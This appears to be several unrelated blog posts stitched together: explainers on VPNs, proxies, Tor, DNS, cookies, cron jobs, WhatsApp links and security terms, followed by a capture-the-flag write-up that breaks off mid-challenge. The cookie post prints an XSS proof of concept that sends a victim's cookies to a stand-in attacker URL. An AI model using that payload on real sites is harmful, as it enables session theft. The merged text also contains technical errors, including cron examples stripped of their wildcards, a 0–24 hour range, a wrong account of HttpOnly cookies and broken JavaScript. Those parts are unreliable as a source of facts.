As usual, you are requested to do your due diligence before using any service providers. I won’t talk much about DNS, so please visit my last post DNS, VPN & Proxies in layman terms to see its breakdown.

So starting off, I first want to clarify three terms i.e, Privacy, Security & Anonymity.

Privacy- Privacy is a concept where people can only see what you want them to see. For e.g- Maybe you don’t want everyone to know where you live, the same could apply to your phone numbers, DOB, etc.

Security- Security is the implementation of certain practices which helps stay safe. For e.g- You use locks to keep your homes safe, the same could apply to using passwords to secure online accounts.

Anonymity- Anonymity is the concept where your online is private online & cannot be deduced easily. For e.g- A journalist would want to keep their identity safe in order to avoid getting tracked by criminal organizations.

Sad to say, most people don’t even know the differences let alone practice them to full avail. It is also worth mentioning privacy & anonymity are often used interchangeably however they both differ in more ways than one.

Towards the end of this article, I’ll share some techniques to protect your online identity. You are requested to read that portion thoroughly in order to reap maximum benefits.

VPN (Virtual Private Network)

VPN or Virtual Private Network is a special technology that creates a private tunnel between a client & Internet by routing traffic through a private network. This essentially enhances the privacy & security of traffic while also shielding it from the prying eyes of any MiTM (Man in The Middle).

To better understand the workings of VPN, let’s first see what actually happens behind the scenes without it:-

Fig: Client → ISP → Internet → Different Servers

1. The client opens the browser & types a domain name.

2. A DNS request is sent to ISP over UDP (port 53) to fetch the corresponding IP address.

3. ISP sends back the IP after receiving it from the authoritative nameserver.

4. The browser sends a connection request to that IP using the selected protocol i.e, HTTP/HTTPS. This request travels over the ISP network.

5. The website sends back a reply which also travels over the ISP network.

Few important points,

i. ISP can see all searches made using DNS & even see HTTP traffic unless it’s encrypted.

ii. In the case of HTTPS even if they can’t figure out the exact transaction, ISPs can pretty much put it together using co-relation analysis.

iii. Websites will see the IP allocated by ISP which will be unique to a single device at a given time. With just a few search queries, the location of the user can be figured out easily.

iv. The same applied to data transfer by mobile apps & underlying OSs. So if you use an app that doesn’t implement HTTPS, your data is pretty much visible to ISP. Simply put this is a privacy nightmare.

v. This could mean ISP can use this data to track you across the Internet, build your profile, show you ads or even sell your data.

vi. Now replace ISP with a malicious MiTM (Man in The Middle), depending on their access level they could do identity theft, perform social engineering, infect your system with malware & or even worse frame you for crimes they commit.

vii. In case you live in a restrictive regime, your government could impose censorship on selective content (websites, social media platforms, and search engines, to name a few). Now since your ISP has to follow government orders, you won’t be able to see these sites without either VPN or a Proxy.

Now let’s see how & where VPN comes into play:-

Fig: Client → ISP → VPN Server → Internet → Different Servers

1. The client installs a VPN software, selects a protocol (more on this below) & clicks connect.

2. The client’s request travels to the VPN provider’s private network over the ISP network. There VPN provider performs key exchange & allocates an IP to the client.

3. Now the connection between the client & VPN provider is encrypted and it will appear as garbage to any onlooker. The client can now search privately without the worry of ISP or malicious actors snooping on the connection.

4. The client opens the browser & searches for a website.

5. DNS request is processed by the VPN provider (unless different DNS servers are configured at OS/network level).

6. The rest process is the same as ISP with the exception of the private tunnel.

Few important points,

i. Connection is only encrypted between the client & VPN provider by default. If you visit an insecure website (non-HTTPS), your traffic between VPN & website is up for grabs.

ii. VPN provider essentially becomes your new ISP, unless they are trusted they pose the same threats.

iii. A single VPN IP is allocated to multiple clients instead of an isolated IP in the case of ISP. It makes it harder to pinpoint the actual location of a user. This also makes it easier to browse the internet over public networks without revealing unnecessary data.

iv. VPN at its core provides privacy & security however achieving anonymity using only VPN is a false claim. Using TOR in conjunction with VPN (more about this in a later section below) is a good practice to achieve this.

v. Services like WebRTC & WebGL could reveal the original IP address even over a VPN. Disabling such services enhances privacy.

vi. VPN cannot protect you from browser fingerprinting which could be utilized to identify an user across the internet. There are also techniques like traffic analysis, search pattern recognition, and behavior analysis among others which could reveal the identity of an user. This is why I said earlier that any VPN which claims you will be anonymous is making misleading claims.

vii. Since VPN traffic can be co-related I’ll recommend changing your servers every once in a while according to your use case. As VPN IPs act like static ones, if you keep using one it will make it easier to pinpoint you among others users having the same IP due to browsing & connection patterns. One more thing to mention is device time can also be used to track someone across the internet. Now I won’t go into much specifics however this is something to keep in mind while surfing the internet.

As we already know that VPN creates a private tunnel between the client & server, let’s see how this is implemented. VPNs use specialized tunneling protocols which help them create this private & secure tunnel. This is also worth mentioning that a VPN connection is only as strong as the protocol it uses.

Each protocol is usually divided into 2 components i.e,

(i) Control channel which looks after the key exchange, IP, DNS, & routes assigning, and authenticating client to VPN server.

(ii) Data channel which transports the actual encapsulated data from client to server & vice versa.

Working in absolute harmony these channels play an important role in keeping communication secure.

Now that we know the basics of protocols, let’s discuss some of the most common ones in use. There are 5 widely popular protocols namely, PPTP, L2TP, IKEv2, OpenVPN & WireGuard. Please note that some protocols use either TCP or UDP. Only OpenVPN is known to use both.

Recently I came to know that ProtonVPN is also working on developing a new protocol that will be more effective in bypassing firewalls & evading censorship.

Now let’s find out more about these protocols:-

1. PPTP- PPTP or Point-to-Point Tunneling Protocol uses Enhanced GRE (General Routing Encapsulation) to establish a connection over TCP port 1723. Originally introduced in 1999 it is an enhanced implementation of PPP (Point-to-Point Protocol). I want to point out that PPTP doesn’t do any encryption by itself & relies on PPP to do so. Now please beware that PPP uses the RC4 algorithm (up to 128 bits) which is known to have several vulnerabilities. For the love of your data please don’t ever use this protocol.

2. L2TP- L2TP or Layer 2 Tunneling Protocol uses IPSec (Internet Protocol Security) along with UDP ports 500, 5500 & 1701 to function. Designed as a replacement for PPTP, it used the AES algorithm to enforce the encryption. As we discussed channels earlier, the control part is handled by IPSec while the data part is handled by L2TP. Please note that according to some leaked reports, NSA had allegedly broken L2TP back in 2016 so it’s wise to look into more secure ones.

3. IKEv2- IKEv2 or Internet Key Exchange version 2 also uses IPSec with UDP ports 500 & 4500 in order to function. While L2TP implemented IPSec, IKEv2 is practically built on top of it. It uses a unique feature known s security associations while leveraging the strength of up to 256 bits with encryption algorithms like AES, Blowfish, ChaCha20, and Camellia. Please note this is a fast & secure protocol compared to the previous two and is widely used in the industry.

4. OpenVPN- OpenVPN is likely the most used VPN protocol in the world with robust security features. It uses SSL/TLS in place of IPSec & offers services over both UDP & TCP which makes it suitable for multiple use cases. It also leverages the power of hardware acceleration something which most VPN protocols tend not to use. One of the most liked things about it is that it uses the OpenSSL library & FPS (Perfect Forward Secrecy) to provide the best possible connection security. One downside of this security mechanism is that OpenVPN requires high computing power in order to deliver. Now do keep in mind that while UDP mode provides fast speeds it cannot bypass censorship due to its very nature, this is where TCP mode comes into play.

5. WireGuard- The latest addition to the protocol family, WireGuard is the fastest VPN protocol to date. By using UDP ports it relies on algorithms like ChaCha20, Curve25519, Poly1305, and BLKE2s in order to offer lightning-fast speeds which are second to none. However due to the fact that UDP is used censorship bypass is still not possible at the moment. Do note that while WireGuard doesn’t offer robust security like OpenVPN, it still packs a punch. With proper configurations, it offers the fastest connection speeds with reasonable security controls.

Now that we know about VPN, let’s dive into Proxies next.

Proxy

Proxy is a special type of server that acts as an intermediary between a client & outside networks (like the internet). It listens for a request and then either forwards it or drops it as per configurations. Please note that while Proxies work in a similar manner as VPNs, they have different use cases.

Proxy servers operate on two implementation levels as follows:-

I. Forward Proxy ( when implemented on the client side)

Fig: Client → Forward Proxy Server → ISP → Internet → Different Servers

1. The client gets the IP of a forward proxy server & configures their system to use it while browsing.

2. The client opens the browser & searches for “medium.com”.

3. This query goes to the forward proxy server who makes the request on client’s behalf.

4. Once “medium.com” sends a response to the forward proxy server, it then forwards it back to the client. It is a pretty effective method since in an ideal scenario website won’t know who actually requested the resources.

II. Reverse Proxy (when implemented on the server side)

Fig: Client → ISP → Internet → Reverse Proxy Server → Different Servers

1. The client opens the browser & searches for “medium.com”.

2. This query travels to the internet over ISP’s network.

3. The Reverse Proxy server receives the requests & checks the configurations for taking action. If action is allowed, this request is sent to the respective server for processing.

4. Once the web server has processed the request it is sent back to the reverse proxy server who then forwards to the client via the internet. This technique of putting reverse proxy servers helps defend actual servers from malicious attacks like DoS/DDoS.

Now few important points,

i. Proxy servers in most cases don’t encrypt traffic by default. In the cases where they do more often than not, it's HTTPS. Make sure to check these things before using any proxy server. This is where VPNs shine with their unique encryption algorithms.

ii. Proxy servers can store browsing logs and use them as per the owner’s policies. It’s always worth paying for a good proxy service than using free ones.

iii. One more danger is that most free (and sometimes paid) proxies are often deployed by a few organizations who then infect them with malware in order to infect users & thus create an army of bots. These bots are then sold to cybercriminals to do as they please i.e launching DoS/DDoS attacks, and using these computers to breach organizations, among other nefarious things.

iv. Proxy servers can share the origin IP in headers like x-forwarded-for which could unmask the client. They can also easily modify the requests/responses without the client knowing.

v. It’s a good idea to use multiple proxy servers from different providers in a chain. This will provide better security with the downside of slow connection speed. One of the most used examples of this type of configuration is the Tor Network (more on this towards the end of this article).

vi. Two of the most famous forward proxy servers for the security community are Burp Suite & OWASP ZAP. Both of these are used to intercept web requests & then perform several operations on them in order to find vulnerabilities & other sensitive information which could help in protecting the intended source & destination.

Now let’s see a different type of proxy protocols we can use:-

I. SOCKS- SOCKS aka Secure Sockets is a protocol that sends your data as is. That means your data is transferred without any attempt to read it. SOCKS-based proxy servers are used simply for data forwarding & receiving. SOCKS currently has two versions i.e, v4 & v5 out of which v5 is the latest & more robust than the former.

II. HTTP- HTTP or Hyper Text Transfer Protocol enabled proxy servers are used as content filters. That means they can see all your data & then either forward or drop it based on their configurations. When these servers use SSL/TLS they are known as HTTPS proxy servers.

Now that we know of some common proxy protocols, let’s see their different types:

I. Transparent proxy- These proxies are also known as level 1 proxies. They don’t provide anonymity to their users & almost always share the origin IP in headers like x-forwarded-for & announce to servers about them being proxies. Their main use case is to cache web content & then store it for a pre-determined time period in order to save bandwidth & other resources.

II. Anonymous proxy- These proxies are also known as level 2 proxies. While they tend not to share the origin IP, they do announce that they are acting as a proxy for a client. These proxies can be used in the scenario when you don’t want to reveal the origin IP but have no qualms about sharing that a proxy server is in use.

III. Elite proxy- These proxies are also known as level 3 proxies. They act as an independent client & don’t give away any indicators which could classify them as a proxy server. They are ideal for the scenario when a client doesn’t want to disclose that they are using a proxy server.

TOR (The Onion Router)

Now that we knocked off some basic concepts about VPNs & Proxies, let me tell you some ways of protecting online identity.

In both VPN & Proxy sections, I have mentioned the term TOR (The Onion Router) which is an advanced open-source implementation of proxy servers in order to provide anonymity to internet users.

Let’s see how TOR works:-

Client → TOR entry node → TOR middle node → TOR exit node → Internet → Different servers

1. The client downloads the TOR software bundle & clicks on the TOR browser.

2. TOR browser starts the connection process which involves finding routes & opening local ports usually (9050).

3. After routes are set client searches for “medium.com”.

4. This request is first sent to the TOR entry node when intercepts it & forwards to the middle node.

5. The middle node intercepts the request & forwards it to the exit node.

6. The exit node intercepts the request & then forwards it to the web server for “medium.com”.

7. When web server sends data back, the same process is repeated in reverse order.

Few important points,

i. In TOR Network one node only knows the address of next node. This use of compartmentalization helps secure the identity of all engaged nodes in a communication.

ii. TOR is used for evading surveillance & protecting online identity. It is one of the most important tool in the arsenal of privacy advocates, journalists, spies & other privacy-minded people.

iii. TOR network operates like layers of onion hence the name The Onion Router. Traffic is forwarded to next node without sharing whole route which makes it difficult to track someone in TOR network.

iv. TOR makes all users identical in order to resist browser fingerprinting, in case you use additional add-ons it could render TOR ineffective.

v. TOR traffic can also be decrypted if uses follows poor internet hygiene which includes browsing HTTP sites, downloading shady files, logging to social media/tracking sites, and following a browsing pattern. It could also happen if an attacker has access to your network traffic along with control over entry & exit nodes.

vi. ISPs can see when someone uses TOR, for this fact the use of VPN is necessary. However using this technique could risk the integrity of TOR traffic if VPN is compromised or you did a misconfiguration. Unless you know exactly what are you doing please don’t use them together.

Now let’s see how we can use VPN in conjunction with TOR to gain maximum anonymity. Please note while I’m sharing this this to give you an overview making proper configurations is your responsibility.

[ Disclaimer: First three scenarios are bad operational security in my perception & I only recommend fourth with a good provider. ]

I. Client → ISP → TOR- In this scenario, client connects to TOR over default ISP network. Here ISP can see that client connected to TOR network as well as see the IP of entry node. Howver they cannot see any traffic that is exchanged as well as the destination.

II. Client → Proxy → ISP → TOR- In this scenario, client first connects to a proxy server then connects to TOR network. While this does sounds more secure than previous scenario it’s not. Here in addition to ISP, Proxy server can also see the origin IP & entry node. This scenario TBH doesn’t makes sense in my mind & I strongly recommend against using it.

III. Client → TOR → Proxy- In this scenario, client first connects to TOR network then uses it to connects to a proxy service. I don’t even know why someone would even do attempt to do this as it undermines the whole concept of TOR. I strongly recommend against using this setup unless you have some exceptional use case for this. Even in that scenario please mote it could be used to decipher your online identity as well as traffic.

IV. Client → VPN → TOR- In this scenario, client first connects to a VPN then tunnels the traffic though their servers. Then connects to TOR network using its software suite. This does two things i.e, prevents ISP from knowing you are using TOR & also prevents TOR from seeing your origin IP. Now this goes without saying that VPN provider should be trusted & situated in a country where they couldn’t be forced to handover their logs/ spy on their users. Now this is a setup which could be used by most users to stay anonymous over internet while enjoying the best of both world i.e VPN & Proxy.

Kudos, you finally made it to the end of this article. Please accept my humble gratitude for reading my article, I hope you liked it. I’m dropping some TOR implementations here, please do your research & see if they match your particular use case: Whonix, TAILS, Orbot, QubesOS.

Please provide your feedback/suggestions in order for me to improve my writing as well as provide better content.

Until we meet again.

While it is very useful to use such technologies it’s always better to know what these technologies can do/cannot do in order to get the most out of them.

I will be discussing DNS, VPN & Proxies in layman's terms so that anyone reading this article could understand them easily. You are humbly requested to devise your individual use case & do due diligence before using any service providers.

So without further ado, let’s dive in.

DNS: Domain Name System

Commonly termed as an Internet phonebook, DNS maps IP addresses to Domain names. Usually traveling over UDP port 53, it queries DNS servers with domain names & fetches the correct IP address(s) in order to load a website.

Let’s see how it actually works.

1. The client opens a browser and types ”medium.com”.

2. This request goes to a DNS recursor (resolver) who checks the local database (cache) to see if the mapping is available there.

3. In case where the record is not found locally, recursor then queries to Root nameserver to get the address of .com TLD nameserver ( Top Level Domain nameserver ).

4. After getting hold of TLD nameserver, recursor gets the address for Authorative nameserver which contains the actual IP address(s) for that domain. This IP data is then sent back to the client who stores it in the cache for some time to resolve faster. In this case, IPs are “162.159.152.4 & 162.159.153.4”.

Now few important points,

i. Recursor could be anyone from your local system to your ISP. It’s always better to use a trusted DNS provider as they have access to literally all of your searches & could use it for various purposes starting from showing you targeted ads to selling your search data. This could get worse if your ISP gets breached & their DNS cache is poisoned as it could direct your every search to sites controlled by a malicious threat actor.

ii. Root nameservers are where records of TLD nameservers are kept. They are 13 nameservers (A-M) which are geographically distributed in clusters using Anycast technology.

iii. A single TLD nameserver contains entries for a particular TLD ( .com, .net, .org, etc) only.

iv. Authorative nameserver is where actual IP-to-DNS records are kept. It could be anyone from the hosting provider to the DNS manager.

v. You could also create these records locally by editing your hosts file. However, I recommend you don’t do so until you know exactly what you are doing.

vi. There are some utilities like dig, nslookup,etc which allows fetching the DNS records from the comfort of CLI.

vii. Make sure you know how the provider will use your data & what is their policy on logs.

VPN: Virtual Private Networks

VPN is a piece of special software which hides your original IP address & helps create a secure connection. This is done by creating a tunnel between your device & VPN provider’s private network, hence the term virtual private network. This essentially helps in hiding the internet traffic thus browsing securely.

Let’s see how it works.

1. The client installs a VPN software, selects a protocol & clicks on connect.

2. This request travels over the internet to the provider’s network.

3. This request then routes through internally managed servers until a server is assigned to the client.

4. Client can now send data that will be traveling encrypted over this private tunnel for their every connection. Websites will see the IP of that VPN server & not of the client.

Now few important points,

i. VPN can offer privacy & security however achieving anonymity using only VPN is a myth. For this consider using anonymous networks like TOR in conjunction with VPN.

ii. Again since they have access to your every data be careful whom you trust. Make sure your provider offers no-logs policy, does independent audits of their company & publishes warrant canaries. Also, make sure this provider is in a country where they can’t be forced to spy on you under the laws.

iii. VPNs encrypt communications so they are very helpful when using public networks for internet surfing. Since public networks can easily be malicious, using a VPN will hide your internet traffic from ISP as well as the network owner.

iv. There are some services like WebRTC that could reveal the original IP address even while using a VPN. It helps if you could disable these services.

v. A large number of free VPN services are often run by a few organizations who use them for malicious purposes. Since people have a tendency to look for free stuff which could potentially end up wreaking havoc, I strongly recommend against it. There is nothing like free lunch here & if it’s free then sadly people are the products. It is also worth noting that some trusted providers like ProtonVPN offer free services, however, do your due diligence first before trusting.

Proxies

Proxies are often misinterpreted as VPNs however both are very different in function as well as use cases. A proxy acts as an intermediary between a client & a server. It listens for a request and then either forwards it or drops it as per configurations.

Let’s see how it works.

1. The client gets the IP of a proxy server & configures their system to use it while browsing.

2. The client opens the browser & searches for “medium.com”.

3. This query goes to the proxy server who makes the request on the client’s behalf.

4. Once “medium.com” sends a response to the proxy server, it then forwards it back to the client. It is a pretty effective method since in an ideal scenario website won’t know who actually requested the resources.

Now few important points,

i. Proxy servers can act on both client side & server side. As per their functionality they could be either a forward proxy (client side) or a reverse proxy (server side).

ii. Proxy servers can share origin IP in headers like x-forwarded-for which could unmask the client. There are different types of proxy servers, make sure you use one that works with your individual use case. One of the most trusted proxy service worldwide is TOR network.

iii. Be careful while using free Proxies, they could easily be setup by malicious threat actors in order to exploit your system. Vet every provider before using their service.

iv. Since proxies could reveal your data in their requests, it’s a good idea to use multiple proxy servers from different providers in a chain. This will provide better security with the downside of slow connection speed.

v. A proxy server doesn’t necessarily mean your data will be encrypted. It is also worth noting that a proxy server can easily modify the requests/responses without the client knowing.

A more comprehensive post on VPN & Proxies will soon follow. Meanwhile if you are still here I would greatly appreciate any feedback in order to provide you with better content.

Who doesn’t love a tasty COOKIE/BISCUIT?

The same is true for the “Website Cookies” (special text files), which are used for authentication, season management, personalization & tracking.

Since HTTP happens to be a STATELESS protocol, websites need to track requests by some method. For this purpose, Lou Montulli created the concept of “COOKIES”. Nowadays all websites use them for one purpose or another.

Now let’s dive into this concept a bit more,

Generally speaking, we have two types of cookies as follows:-
1. Session cookie: Session cookies are cookies that last for a session. A session starts when you launch a website or web app and ends when you leave the website or close your browser window. They contain information that is stored in a temporary memory location which is deleted after the session ends. Unlike other cookies, session cookies are never stored on your device. Therefore, they are also known as transient cookies, non-persistent cookies, or temporary cookies.

2. Permanent cookie: Permanent cookies are set with an expiration date and stored on a user s hard drive until they expire or until the user deletes the cookie. They are used to collect identifying information about the user, such as Web surfing behavior or user preferences for a specific Web site. They are also known as permanent cookies or stored cookies.

Cookies are allocated & shared through HTTP Headers “Set-Cookie” & “Cookie”, respectively. These cookies can be either HTTP-only or SECURE, depending on the security implantation. A HTTP-only cookie travels over HTTP protocol & prevents JavaScript from reading stored cookies whereas a SECURE cookie is only sent to the server with an encrypted request over the HTTPS protocol & mitigates Man in The Middle (MiTM) attacks.

To further enhance these controls, “ Host-only” flag and “Path” attribute can be added to lockdown the cookie to a particular HOSTNAME and PATH.

To take it one notch further “SameSite” flag could be used to prevent Cross-Site Request Forgery (CSRF). SameSite can take one of three possible values i.e, Strict, Lax or None

These cookies reside in a special storage known as a “cookie jar” inside the browser. You can view your cookies either through browser developer settings/addons or by invoking “document.cookie” API.

Now you might ask how all this relates to a security standpoint, well since these cookies contain juicy details they can provide easy access to a website and thus to a network as well. Didn’t get it, no issues just imagine an “authenticated Administrator” losing their cookies.

This is also why most XSS attacks tend to extract cookies from the victim’s browser.

One Proof of concept to show this attack will be:-

<script>
var x = image();
x.src=”example.com/xss.php?q=”+document.cookie;
</script>

Where you can simply create an image object and point it to an attacker-controlled website. Then it will log the cookie there which can be further used in chained attacks.

Now to mitigate these issues web devs could:-
1. Implement secure session cookies which expire as soon as the session terminates.
2. Install security plugins and follow secure design principles.

On the other hand, users can:-
1. Install add-ons like NoScript to prevent XSS.
2. Avoid clicking on links & cleaning the cookie jar as often as possible.

To learn more about cookies, do visit these great documentations:-

1. W3C : https://www.w3.org/2001/tag/2010/09/ClientSideStorage.html

2. Mozilla : https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies

“Cron jobs” if you don’t already know are an amazing way for scheduling tasks on Linux servers.

Cron is comprised of two parts i.e, “crontab” ( which contains your cron expressions ) and “crond” ( cron daemon which runs in the background & monitors crontab ).

Crontab can be edited using the command “crontab -e” and pointed to either a specific command or a shell script. Just make sure to use the absolute path for either of them.

Crond on the other hand executes the commands at a specific time.

Working together in harmony, they make sure the assigned task is executed at the right time.

Since we got the basic idea, let’s move on to the execution part.

A crontab contains seven fields as follows:-

1 2 3 4 5 6 7

Where,

1ST PLACE is for minutes (0–59)

2ND PLACE is for hour (0–24)

3RD PLACE is for day of month (1–31)

4TH PLACE is for month (1–12)

5TH PLACE is for day or week (0–7; both 0 & 7 can be used for sunday)

6TH PLACE is for user account (always make sure assigned user account has sufficient permissions to run the commands)

7TH PLACE is for the absolute path of command/shell script.

Here are some of the shortcuts to make jobs even more easier:-

@yearly @annually @monthly @weekly @daily @midnight @noon @reboot

These shortcuts do exactly what they say and they are worth implementing if the use case matches.

If you use shortcuts make sure to only include “user” and “command”.

Now that we are familiar with syntax let’s see some examples in action:-

1 2 3 4 5 root /usr/share/backup.sh

Which simply states

At 02:01AM on day-of-month 3 and on Friday in April “RUN” /usr/share/backup.sh as root

Let’s also see an example using the shortcut:-

@daily root /usr/share/backup.sh

Which simply means

“RUN” /usr/share/backup.sh as root on daily basis.

Also since we are using Linux, wildcards (*) are allowed too. Let’s see their example as well:-

1 2 5 root /usr/share/backup.sh

Which simply says,

At 02:01AM on friday in every month “RUN” /usr/share/backup.sh as root

[ NOTE:- “cron” requires the system to run 24/7 so it’s not ideal for running on a desktop/laptop. For this particular purpose use “anacron”. ]

On an ending note, I would also like to mention “crontab.guru” which is one of the best websites when it comes to creating/editing cron jobs. Give it a shot if you are new to server administration or want to check your expressions.

Here’s how you can do that as well, just follow these 3 simple steps given below:-

1. Open a web browser (make sure you have redirections/open links in apps enabled).

2. Navigate to “https://wa.me/<country code><WhatsApp number>” by entering above query in url bar.

3. You will be redirected to “api.whatsapp.com”. Just click on the “CONTINUE TO CHAT/OPEN IN WHATSAPP/OPEN (popup)” option (depending on the browser) and voilà.

[ NOTE: DON’T USE “+” SIGN in country code, suppose you are messaging someone in India then just use country code i.e, 91 instead of +91. ]

Example:- https://wa.me/919876543210

Where,
91 is the country code without the + sign
9876543210 is the WhatsApp number.

This is a very handy WhatsApp API feature which is uncommon knowledge. Do share this with your friends and family.

Sometimes people get confused by these terms or find it hard to retain their differences.

➊. 𝐀𝐮𝐭𝐡𝐞𝐧𝐭𝐢𝐜𝐚𝐭𝐢𝐨𝐧 𝐯𝐬 𝐀𝐮𝐭𝐡𝐨𝐫𝐢𝐳𝐚𝐭𝐢𝐨𝐧:

𝐀𝐮𝐭𝐡𝐞𝐧𝐭𝐢𝐜𝐚𝐭𝐢𝐨𝐧 is the process of verifying the identity. It uses a combination of techniques/methods to verify the identity. For e.g: If one of your friends calls you from an unknown number, after hearing their voice you’ll ask ABC, is that you? and they will reply yes, it’s me.

Whereas 𝐀𝐮𝐭𝐡𝐨𝐫𝐢𝐳𝐚𝐭𝐢𝐨𝐧 refers to the permissions attached to performing a certain task. This often comes after authentication is successful and a task is to be executed. For e.g: While making online payments you are asked to input PIN/OTP which is a form of authorization.

[ NOTE: While these solutions might sound very true there are ways to circumvent them. ]

➋. 𝐃𝐑𝐘 𝐩𝐫𝐢𝐧𝐜𝐢𝐩𝐥𝐞 𝐯𝐬 𝐖𝐄𝐓 𝐩𝐫𝐢𝐧𝐜𝐢𝐩𝐥𝐞:

𝐃𝐑𝐘 stands for “Don’t Repeat Yourself”. Simply put it minimizes bugs & shortens codebase size

Whereas 𝐖𝐄𝐓 stands for “Write Everything Twice”. Simply put it means the same code is implemented at least two times in a codebase. It offers the flexibility to use the same code for two different purposes.

[ NOTE: These two terms are not common as they are part of the software development process. There are high chances of seeing their implementation if you do web app pentest or code reviews. ]

➌. 𝐔𝐑𝐈 𝐯𝐬 𝐔𝐑𝐋:

𝐔𝐑𝐈 or Uniform Resource Identifier provides the identity of an item. For e.g: the IMEI no of your smartphone can be defined as Uri, or the ISBN no of a book, or better yet your roll number/employee id.

𝐔𝐑𝐋 or Uniform Resource Locator provides a way to reach any location. It comprises of a protocol, domain name/IP address and path to the resource. For e.g: https://medium.com

➍. 𝐏𝐞𝐧𝐞𝐭𝐫𝐚𝐭𝐢𝐨𝐧 𝐭𝐞𝐬𝐭𝐢𝐧𝐠 𝐯𝐬 𝐑𝐞𝐝 𝐭𝐞𝐚𝐦 𝐚𝐬𝐬𝐞𝐬𝐦𝐞𝐧𝐭:

𝐏𝐞𝐧𝐞𝐭𝐫𝐚𝐭𝐢𝐨𝐧 𝐭𝐞𝐬𝐭𝐢𝐧𝐠 is a process to test the security of a company/system/network/website/software. For e.g: You hired a lockpicker to check the strength of your locks.

𝐑𝐞𝐝 𝐭𝐞𝐚𝐦 𝐚𝐬𝐬𝐞𝐬𝐦𝐞𝐧𝐭 on the other hand deals with testing the strength of blue team & adversary simulation. For e.g: You hired a professional thief to test out your state-of-the-art home security system.

[ NOTE: There is a fine line between these two terms. In most scenarios, they differ only in terms of use cases. In other scenarios, their terms are often interchanged. ]

➎. 𝐂𝐈𝐀 𝐭𝐫𝐢𝐚𝐝 𝐯𝐬 𝐃𝐀𝐃 𝐭𝐫𝐢𝐚𝐝:

𝐂𝐈𝐀 𝐭𝐫𝐢𝐚𝐝 stands for Confidentiality, Integrity & Availability. It’s part of the Blue team side of security where these terms help design security mechanisms. For e.g: You use WhatsApp to send encrypted messages to another person & can do until WhatsApp servers are down or there is a Man-In-The-Middle (MITM ).

𝐃𝐀𝐃 𝐭𝐫𝐢𝐚𝐝 stands for Disclosure, Alter & Denial. It’s part of the Red team side of security where they define breaking of the CIA triad. For e.g: If someone intercepts your WhatsApp traffic and manages to break the encryption they can read, modify or even permanently delete your messages.

[ NOTE: While WhatsApp encrypts your text messages, any documents sent over it are not encrypted and remain plaintext in its servers. Anyone with access to these servers/MITM can easily read them. Be mindful of what you share over WhatsApp ]

➏. 𝐑𝐞𝐯𝐞𝐫𝐬𝐞 𝐬𝐡𝐞𝐥𝐥 𝐯𝐬 𝐁𝐢𝐧𝐝 𝐬𝐡𝐞𝐥𝐥: For this let’s imagine you have two devices i.e, a client ( your smartphone ) and a server ( your laptop ). For the sake of simplicity let’s also assume these two are in the same LAN network.

In 𝐑𝐞𝐯𝐞𝐫𝐬𝐞 𝐬𝐡𝐞𝐥𝐥 scenario the client will open a port and the server will connect back to it using the IP:Port combo. This is very useful in case of circumventing firewalls. For e.g: Let’s assume you met someone and instead of asking them, shared your phone number so they can contact you.

Whereas in 𝐁𝐢𝐧𝐝 𝐬𝐡𝐞𝐥𝐥 server will open a port and the client will connect to it using the IP:Port combo. This is helpful but less reliable if security measures are in place. For e.g: Let’s assume you met someone & they shared their phone no so you can contact them.

[ NOTE: Both of these shells have their individual use cases, sometimes you will use reverse and sometimes bind. It often takes trial & error to find a perfect solution for a given scenario, however in most cases reverse shell will do well than a bind one. ]

➐. 𝐄𝐧𝐜𝐫𝐲𝐩𝐭𝐢𝐨𝐧 𝐯𝐬 𝐇𝐚𝐬𝐡𝐢𝐧𝐠:

𝐄𝐧𝐜𝐫𝐲𝐩𝐭𝐢𝐨𝐧 is a terminology given to the process of encoding information in a way that it cannot be recovered without a secret (code/key). Simply put using this technique you can encode/decode your content ( text, files, devices ). Encryption is used to provide confidentiality among two or more people. Some common encryption algorithms are AES, RSA, etc.

For e.g: Let’s imagine you have a lock and a key, in this case, that lock can’t be opened without that key.

Whereas 𝐇𝐚𝐬𝐡𝐢𝐧𝐠 is a different technique that uses special mathematical functions to encode data in such a manner that it cannot be reversed. Due to this unique property, hashing is also used to store passwords in a database. It is also worth mentioning there is no secret/key in this scenario. Hashes are used to verify the integrity of a given data/file. Some of the common hash algorithms are MD5, SHA256, etc.

For e.g: You login into your Computer using a combination of username/password. This password is stored in the form of a hash and when you type it in the login panel, the system translates it into a hash & then compares it with the one stored in its database. Only if both matches, access is granted.

If you have read till here, thank you for bearing with me. While I wrote this post to explain concepts in layman's terms, hope you enjoyed it.

So without further ado let’s see what these challenges were & how I tackled them.

1. Corrupt Committee:-

Description: Our investigation team has discovered that some senior officials of a certain Olympic Committee have received significant bribes in the past, specifically in 2012. Unfortunately, we do not know much more; we only have the following image for you to start your investigation, which is somehow related to the recipient of the payment. Regarding the amount of the payment, we only know that it must be significantly higher than the rest of the payments received that year.

Can you help us bring the guilty parties to justice?

(The token of this challenge will be the identifier of the payers)

SOLUTION: There was a QR code given which had “1BWaryNxvEdkzRMZ6L4y2bgvBwhRyFTHQ2”, since this was a payment challenge my mind went straight to cryptocurrency. I searched this string on Blockchain.com and got 2 linked wallets. After searching through Bitcoin wallet by the year 2012, I got:

Fee 0.00000000 BTC(0.000 sat/B — 0.000 sat/WU — 258 bytes) +10.00000000 BTC

Hash b8d6559c52ad2c3137151a6eb091729d6d104e21a688549dc2a8557ab5e156b2: 2012–09–30 16:19
1Ce1DeJf6HHHKPBKH63qC7kzP6m2a3rDrr: 51.41448112 BTC

18nbMfiKjucUhs7tps6G8NGziPwK2MX9aZ: 41.41448112 BTC

1BWaryNxvEdkzRMZ6L4y2bgvBwhRyFTHQ2: 10.00000000 BTC

After entering the wallet address “1Ce1DeJf6HHHKPBKH63qC7kzP6m2a3rDrr” I pwned the 1st challenge.

2. Metaverse Cracking:-

Description: Do you like the metaverse, the NFTs, and cryptography, and would you like to help Juan earn money through a bug?

This is your challenge!

Not long ago Juan downloaded an NFT game with the idea of starting to earn cryptocurrencies. The game caught his attention because of the dynamics it followed.

The game consists of the following:

Random encrypted passwords are generated every day and the player can crack as many as he can and wants, as long as he has energy left. A user has 5 energy points per day, and for each play (hash detection attempt plus password cracking) 0.5 points are lost, i.e. the user has a total of 10 plays.
The interface is very simple: it consists of a screen with padlock cards and a brief description of how difficult or improbable it is to crack the generated password. The user chooses which padlock to attack, i.e. which password he wants to crack. Once he has chosen it, he clicks on the Crack button. Once this is done, the program returns on screen the hash and/or the password if it has been obtained along with two fields where the user must enter what has been obtained and press the Solve button.

The benefits that the player can get are:

Between 0.00008 ETH and 0.00021 ETH if the hash is successfully detected.
